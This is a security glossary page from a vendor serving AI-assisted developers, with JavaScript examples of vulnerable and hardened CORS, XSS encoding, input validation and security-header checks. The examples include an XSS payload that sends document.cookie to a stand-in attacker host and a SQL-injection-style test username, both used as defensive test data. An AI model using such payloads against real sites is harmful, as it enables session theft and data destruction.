Security fix instructions formatted as prompts that can be pasted directly into AI coding assistants like Cursor, Claude Code, or GitHub Copilot. Instead of traditional CVE descriptions or abstract recommendations, AI-ready remediation prompts tell your AI assistant exactly what to fix, where to fix it, and how — in the language it understands best. This approach bridges the gap between identifying a security issue and actually resolving it, reducing fix time from hours to minutes.
Security glossary
Clear definitions of security terms every vibe coder should know. No jargon walls — just practical explanations you can actually use.
An attack where a malicious website loads your application inside an invisible or transparent iframe and positions it so that users who think they are clicking the attacker's page are actually clicking buttons or links in yours. For example, an attacker could overlay an invisible 'Transfer Funds' button from your banking app on top of a 'Play Video' button on their site. Prevented by the Content-Security-Policy frame-ancestors directive (the current mechanism) or the older X-Frame-Options header; an application that is never legitimately embedded should send frame-ancestors 'none', plus X-Frame-Options: DENY for browsers that predate CSP.
An HTTP response header that tells browsers which sources of content (scripts, styles, images, frames, etc.) are allowed to load on your page. CSP is the strongest browser-side mitigation for Cross-Site Scripting (XSS): it does not remove the injection bug, but a policy such as script-src 'self' (with no 'unsafe-inline') stops the browser from executing an injected inline script or a script pulled from an attacker's domain. AI-generated code frequently ships without CSP, or with a policy that allows 'unsafe-inline' or '*' in script-src, which gives back exactly the protection CSP was meant to provide.
A browser mechanism that controls which origins (other websites) are allowed to read responses from your API in a user's browser. CORS does not stop a request from being sent; it decides whether the calling page may see the result. Setting Access-Control-Allow-Origin to '*' lets any site read your unauthenticated responses, and the more dangerous variant, reflecting whatever Origin header arrives together with Access-Control-Allow-Credentials: true, lets any website make cookie-authenticated requests to your API on behalf of your users and read the responses. Misconfigured CORS is one of the most common security misconfigurations in vibe-coded applications, often introduced because AI assistants suggest permissive CORS settings to 'fix' cross-origin errors during development.
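The three server behaviours described above, as an added example that is not VibeSec's code: reflecting any Origin, a substring match, and an exact allowlist, next to a small model of how a browser decides whether a page may read a credentialed response. The origins and the allowlist are assumed for illustration; nothing here depends on a web framework.

```javascript
// Added example, not VibeSec's code: three ways a server can answer the
// browser's Origin header, and a model of how a browser treats each answer
// for a credentialed (cookie-carrying) fetch. Runs without a web framework.

// Origins allowed to call this API from a browser (assumed for illustration).
const ALLOWED_ORIGINS = new Set(['https://app.example.com', 'https://admin.example.com']);

// Vulnerable: echo whatever Origin arrived and allow credentials. Any site
// can now make a cookie-authenticated request and read the response.
function corsReflectAnyOrigin(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Also vulnerable, and common: a substring check instead of an exact match.
// 'https://evilexample.com' ends with 'example.com' and passes.
function corsSuffixMatch(origin) {
  if (!origin.endsWith('example.com')) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened: exact match against an allowlist. Unknown origins get no CORS
// headers at all, so the browser refuses to hand the response to the page.
// Vary: Origin keeps caches from serving one origin's response to another.
function corsAllowlisted(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Browser rule for fetch(url, { credentials: 'include' }): the page may read
// the response only if Allow-Origin is exactly its own origin (the '*'
// wildcard is rejected in credentialed mode) and Allow-Credentials is 'true'.
function browserAllowsCredentialedRead(pageOrigin, responseHeaders) {
  const allowOrigin = responseHeaders['Access-Control-Allow-Origin'];
  const allowCreds = responseHeaders['Access-Control-Allow-Credentials'] === 'true';
  return allowOrigin === pageOrigin && allowCreds;
}

// Constructed origins: a legitimate front end and two attacker-controlled sites.
const TRUSTED = 'https://app.example.com';
const ATTACKER = 'https://evil.example';
const LOOKALIKE = 'https://evilexample.com';
```

A plain `Access-Control-Allow-Origin: *` is acceptable for a genuinely public, unauthenticated API, because browsers refuse to combine it with credentials; the problem starts when an assistant "fixes" a failing credentialed request by reflecting the Origin instead.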
A vulnerability that allows an attacker to inject JavaScript into a page of your web application. When other users visit the affected page, the attacker's script runs in their browser with the privileges of your origin: it can read and modify the page, send requests that carry the user's session, and read any cookie not flagged HttpOnly. XSS is consistently in the OWASP Top 10 and is one of the most common vulnerabilities found in AI-generated code, usually caused by writing untrusted data into markup without output encoding, for example through innerHTML or React's dangerouslySetInnerHTML.
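The unsafe rendering pattern above next to its encoded form, as an added example that is not VibeSec's code. It is string-based so it runs outside a browser; the comment template, the `escapeHtml` helper and the attacker payload are all constructed for the example.

```javascript
// Added example, not VibeSec's code: the same comment widget rendered with
// raw string interpolation (what innerHTML-based code usually does) and with
// output encoding. String-based so it runs outside a browser; in the DOM the
// safe equivalent is textContent, or the default escaping of JSX/template engines.

// Encode the characters that are significant in HTML text and quoted
// attribute values. This encoder is for those two contexts only; data placed
// in a URL, a script block or an event handler needs a context-specific encoder.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: attacker-controlled fields are concatenated straight into markup.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: every untrusted value is encoded at the point it enters markup.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Crude test oracle: does the output contain an element or URL scheme the
// template never emits? (A detector for the example, not a sanitizer.)
function containsInjectedMarkup(html) {
  return /<(script|img|svg|iframe)\b|javascript:/i.test(html);
}

// Constructed attacker input: an image tag whose error handler exfiltrates
// document.cookie to a site the attacker controls.
const PAYLOAD = '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">';
```

Encoding at output time is the fix; stripping `<script>` from input is not, because the payload above contains no script tag at all and would pass such a filter.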
An HTTP response header that instructs browsers to connect to your site only over HTTPS, never HTTP, for the number of seconds given by max-age. Without HSTS, any visit that starts from an http:// link or a typed hostname begins unencrypted, exposing the user to a man-in-the-middle attacker who intercepts and modifies the traffic before your redirect to HTTPS ever arrives. With HSTS the browser upgrades those requests itself after its first secure visit; the preload directive, together with submission to the browser preload list, closes the first-visit window as well. HSTS should be configured with a max-age of at least one year (31536000 seconds), the includeSubDomains directive, and ideally preload.
The practice of checking and rejecting data received from users before processing it, so that only input matching the expected type, length, and format reaches your application logic. Input validation shrinks the attack surface for injection attacks (SQL injection, XSS, command injection) but does not replace the primary defenses: parameterized queries, output encoding, and avoiding shell invocation altogether. AI-generated code frequently lacks proper input validation, especially on API endpoints, because AI assistants focus on making the happy path work rather than defending against adversarial input.
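One way to validate an API request body along the lines described above, as an added example that is not VibeSec's code. The endpoint, the field schema and the two request bodies are assumptions made for the example.

```javascript
// Added example, not VibeSec's code: validating the JSON body of an assumed
// POST /api/users endpoint before it reaches business logic or the database.
// Unknown fields are rejected (an allowlist), each field gets a type, a length
// or range and a format check, and all errors are collected in one pass.

const USER_SCHEMA = {
  username: { type: 'string', min: 3, max: 32, pattern: /^[a-z0-9_]+$/ },
  email:    { type: 'string', min: 3, max: 254, pattern: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  age:      { type: 'integer', min: 13, max: 150, optional: true },
};

function validate(body, schema) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { ok: false, errors: ['body must be a JSON object'] };
  }
  const errors = [];
  // Allowlist keys so a client cannot smuggle fields the endpoint never
  // intended to accept, such as isAdmin or role (mass assignment).
  for (const key of Object.keys(body)) {
    if (!Object.prototype.hasOwnProperty.call(schema, key)) errors.push(`unexpected field: ${key}`);
  }
  for (const [key, rule] of Object.entries(schema)) {
    const value = body[key];
    if (value === undefined) {
      if (!rule.optional) errors.push(`${key} is required`);
      continue;
    }
    if (rule.type === 'string') {
      if (typeof value !== 'string') { errors.push(`${key} must be a string`); continue; }
      if (value.length < rule.min || value.length > rule.max) errors.push(`${key} must be ${rule.min}-${rule.max} characters`);
      if (rule.pattern && !rule.pattern.test(value)) errors.push(`${key} has an invalid format`);
    } else if (rule.type === 'integer') {
      // Number.isInteger rejects "20" (a string), 20.5 and NaN alike.
      if (!Number.isInteger(value)) { errors.push(`${key} must be an integer`); continue; }
      if (value < rule.min || value > rule.max) errors.push(`${key} must be between ${rule.min} and ${rule.max}`);
    }
  }
  return { ok: errors.length === 0, errors };
}

// Constructed request bodies: one well-formed, one with the kind of input an
// attacker or a sloppy client sends.
const GOOD_BODY = { username: 'alice_01', email: 'alice@example.com', age: 30 };
const BAD_BODY = {
  username: "admin'; DROP TABLE users;--",
  email: 'not-an-email',
  age: '20',
  isAdmin: true,
};
```

The username rule rejects the SQL-looking value only because it contains characters outside `[a-z0-9_]`; the query that eventually stores it must still use a parameterized statement, since validation is a second line of defense rather than the injection fix.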
The Open Web Application Security Project's list of the ten most critical security risks to web applications, updated periodically based on real-world vulnerability data. The 2021 edition lists broken access control, cryptographic failures, injection, insecure design, security misconfiguration, vulnerable and outdated components, identification and authentication failures, software and data integrity failures, security logging and monitoring failures, and server-side request forgery. The OWASP Top 10 serves as a baseline standard for web application security.
A non-invasive external security evaluation that measures an application's security posture without accessing source code or impacting production systems. VibeSec's security assessment covers HTTP security headers, SSL/TLS configuration, CORS policies, DNS enumeration, and infrastructure fingerprinting. The result is a comprehensive report with findings organized by severity, an executive summary with a security grade, and AI-ready remediation prompts that can be pasted directly into AI coding assistants for immediate fixes.
HTTP response headers that instruct browsers to enable security protections for your web application. Key security headers include Content-Security-Policy (CSP), Strict-Transport-Security (HSTS), X-Frame-Options, X-Content-Type-Options, Referrer-Policy, and Permissions-Policy. Missing or misconfigured security headers are the single most common finding in VibeSec assessments — they are easy to add, provide significant protection, and are frequently omitted by AI coding assistants.
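A header set covering the clickjacking, CSP and HSTS entries above, plus a checker that reviews a captured response's headers the way the external assessment entry describes, as an added example. This is not VibeSec's scanner or its grading logic: the recommended values, the severity thresholds, the letter-grade scale and the weak sample response are all assumptions made for the example.

```javascript
// Added example, not VibeSec's own code or scanner: a recommended header set
// and a checker that reviews a captured response's headers the way an external
// assessment would. Thresholds and the letter-grade scale are assumptions.

// Header set for an app that is never embedded in frames and serves only
// its own scripts. Tighten or loosen per application.
const RECOMMENDED_HEADERS = {
  'Content-Security-Policy':
    "default-src 'self'; script-src 'self'; object-src 'none'; " +
    "frame-ancestors 'none'; base-uri 'self'",
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload',
  'X-Frame-Options': 'DENY',
  'X-Content-Type-Options': 'nosniff',
  'Referrer-Policy': 'strict-origin-when-cross-origin',
  'Permissions-Policy': 'camera=(), microphone=(), geolocation=()',
};

// Constructed sample: headers typical of a freshly generated Express app whose
// CSP was loosened until the console errors went away.
const WEAK_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'Content-Security-Policy': "default-src * 'unsafe-inline'",
  'X-Powered-By': 'Express',
};

// HTTP header names are case-insensitive; normalise before lookup.
function lowerKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Parse a CSP string into { directive: [sources...] }.
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives[tokens[0].toLowerCase()] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return directives;
}

const ONE_YEAR = 31536000;

// Returns findings as { header, severity, message }. Empty array: nothing to report.
function checkHeaders(rawHeaders) {
  const h = lowerKeys(rawHeaders);
  const findings = [];
  const add = (header, severity, message) => findings.push({ header, severity, message });

  const hsts = h['strict-transport-security'];
  if (!hsts) {
    add('Strict-Transport-Security', 'high', 'missing; browsers will not upgrade http:// requests');
  } else {
    const m = /max-age=(\d+)/i.exec(hsts);
    const maxAge = m ? Number(m[1]) : 0;
    if (maxAge < ONE_YEAR) add('Strict-Transport-Security', 'medium', `max-age ${maxAge} is below one year`);
    if (!/includesubdomains/i.test(hsts)) add('Strict-Transport-Security', 'low', 'includeSubDomains not set');
  }

  const csp = h['content-security-policy'];
  let framingRestricted = Boolean(h['x-frame-options']);
  if (!csp) {
    add('Content-Security-Policy', 'high', 'missing; no browser-side limit on injected scripts');
  } else {
    const d = parseCsp(csp);
    // script-src falls back to default-src; neither present means scripts are unrestricted.
    const scriptSrc = d['script-src'] || d['default-src'];
    if (!scriptSrc) {
      add('Content-Security-Policy', 'high', 'no script-src or default-src directive');
    } else {
      // Note: browsers ignore 'unsafe-inline' when a nonce or hash is also listed,
      // so a nonce-based policy would need a more careful check than this.
      if (scriptSrc.includes("'unsafe-inline'")) add('Content-Security-Policy', 'high', "script-src allows 'unsafe-inline'; injected inline scripts still run");
      if (scriptSrc.includes('*')) add('Content-Security-Policy', 'high', 'script-src allows any origin');
    }
    if (d['frame-ancestors']) framingRestricted = true;
  }
  if (!framingRestricted) add('X-Frame-Options', 'medium', 'neither frame-ancestors nor X-Frame-Options set; page can be framed (clickjacking)');

  if (String(h['x-content-type-options'] || '').toLowerCase() !== 'nosniff') add('X-Content-Type-Options', 'low', 'nosniff not set');
  if (!h['referrer-policy']) add('Referrer-Policy', 'low', 'missing; full URLs may leak in Referer');
  if (!h['permissions-policy']) add('Permissions-Policy', 'low', 'missing; powerful browser features not restricted');
  return findings;
}

// Assumed grading scale: any high finding fails outright.
function grade(findings) {
  const sev = new Set(findings.map((f) => f.severity));
  if (sev.has('high')) return 'F';
  if (sev.has('medium')) return 'C';
  if (sev.has('low')) return 'B';
  return 'A';
}
```

Against `WEAK_HEADERS` the checker reports the missing HSTS and both the `*` and `'unsafe-inline'` script sources as high, the absent framing restriction as medium, and the three remaining headers as low; the recommended set produces no findings. The `X-Powered-By` header in the sample is not graded here, but an assessment would normally flag it as fingerprinting information worth removing.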
Cryptographic protocols that encrypt data transmitted between a user's browser and your server, preventing eavesdropping and tampering and letting the browser verify that it is talking to the genuine server. TLS (Transport Layer Security) is the modern successor to SSL (Secure Sockets Layer), though the term 'SSL' is still commonly used. Every web application should enforce TLS 1.2 or higher (preferably 1.3), use strong cipher suites, and serve a valid certificate issued by a trusted CA for the exact hostname and renewed before it expires. Combined with HSTS, this ensures all connections to your application are encrypted.
The period between an AI model's training data cutoff and the present day, during which new vulnerabilities (CVEs) are discovered and disclosed that the AI cannot know about. Because AI coding assistants can only reference security information from their training data, they are inherently blind to threats discovered after their cutoff date. This gap — typically 3 to 12 months — is where real-world attackers operate, making AI-only security reviews fundamentally incomplete. Professional security assessment bridges this gap with up-to-date vulnerability intelligence.
A software development approach where developers primarily use AI coding assistants — such as Cursor, Claude Code, GitHub Copilot, Bolt, Lovable, or v0 — to generate the majority of their application's code. The developer provides high-level direction and intent (the 'vibe') while the AI handles implementation details. Vibe coding enables rapid prototyping and shipping but introduces unique security risks because the developer may not fully understand the generated code's security implications.
The practice of securing applications built primarily with AI coding assistants. Vibe coding security addresses the unique risks introduced when AI generates the majority of an application's codebase, including the months-long gap between the model's training cutoff and current vulnerability knowledge, AI-introduced misconfigurations, missing security hardening, and the reduced developer familiarity with generated code. VibeSec Advisory specializes in vibe coding security, providing assessments with AI-ready remediation prompts designed to work with the same tools developers use to build.
Know the terms. Now secure the app.
Run a free security scan and find out how your application stacks up against these standards.